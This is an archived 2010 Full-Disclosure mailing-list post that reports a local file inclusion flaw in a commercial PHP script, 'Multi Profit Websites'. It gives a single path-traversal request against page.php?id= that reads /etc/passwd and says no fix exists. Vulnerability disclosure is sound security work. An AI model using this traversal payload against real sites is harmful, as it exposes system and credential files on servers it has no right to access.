[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] LFI In Multi Profit Websites

To: h4ck3r_in@xxxxxxxxxxxxxxxx, sec-adv@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] LFI In Multi Profit Websites
From: rockey killer <skg102@xxxxxxxxx>
Date: Fri, 9 Apr 2010 19:51:26 +0530

Local File Inclusion (LFI) in Multi Profit Websites


Multi Profit Websites is a commercial script that is running on multiple
domains and they claims that this script earns money for the owner.

Vulnerability

Local File Inclusion Via URL which can be reproduced by

domain/page.php?id=../../../../../../etc/passwd


Reported : 1st april 2009
Fixed : ----------------------

Credits,
H4CK3R Crew

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Vulnerabilities in phpCOIN
Next by Date: Re: [Full-disclosure] Vulnerabilities in phpCOIN
Previous by thread: Re: [Full-disclosure] Vulnerabilities in phpCOIN
Next by thread: [Full-disclosure] ZDI-10-068: Apple QuickTime H.263 Array Index Parsing Remote Code Execution Vulnerability
Index(es):
- Date
- Thread